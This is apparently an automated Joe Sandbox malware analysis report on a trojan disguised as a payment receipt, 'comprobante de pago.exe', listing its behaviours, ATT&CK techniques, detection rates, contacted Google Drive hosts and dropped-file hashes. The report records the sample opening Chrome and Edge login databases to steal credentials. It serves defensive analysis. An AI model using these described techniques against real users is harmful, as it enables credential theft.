Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A0

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	114 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
comprobante de pago.exe	17%	Virustotal		Browse
comprobante de pago.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe	16%	ReversingLabs
C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe	21%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.184.238	true	false		high
drive.usercontent.google.com	142.250.185.129	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/uj3x	dxdiag.exe, 00000018.00000002.2503286760.0000000007776000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000003.2030532976.0000000007776000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ac.ecosia.org?q=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	dxdiag.exe, 00000018.00000002.2503286760.0000000007776000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000003.2030532976.0000000007776000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	comprobante de pago.exe, comprobante de pago.exe.1.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/v20	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1851875810.0000000005221000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	dxdiag.exe, 00000018.00000002.2503286760.0000000007707000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtabv209h	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1851875810.0000000005221000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=	dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.129	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
142.250.184.238	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636106
Start date and time:	2025-03-12 12:05:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	comprobante de pago.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@31/32@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 93 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56, 150.171.28.10, 92.123.104.42, 172.202.163.200
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:06:04	API Interceptor	34x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	yJLckVp9HE.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse	142.250.185.129 142.250.184.238
	yJLckVp9HE.exe	Get hash	malicious	Unknown	Browse	142.250.185.129 142.250.184.238
	DTSSymmetryDLL.dll.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	142.250.185.129 142.250.184.238
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.185.129 142.250.184.238
	TEDGRQXB.exe	Get hash	malicious	Vidar	Browse	142.250.185.129 142.250.184.238
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.185.129 142.250.184.238
	scripthook.zip	Get hash	malicious	Unknown	Browse	142.250.185.129 142.250.184.238
	1776871603.exe	Get hash	malicious	Clipboard Hijacker	Browse	142.250.185.129 142.250.184.238
	MG710417.exe	Get hash	malicious	Azorult	Browse	142.250.185.129 142.250.184.238
	RFQ.exe	Get hash	malicious	DarkCloud	Browse	142.250.185.129 142.250.184.238

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15jqc1jh.yds.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ckrqwvp.wgb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rn5opmyi.00d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1q0i41t.mha.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

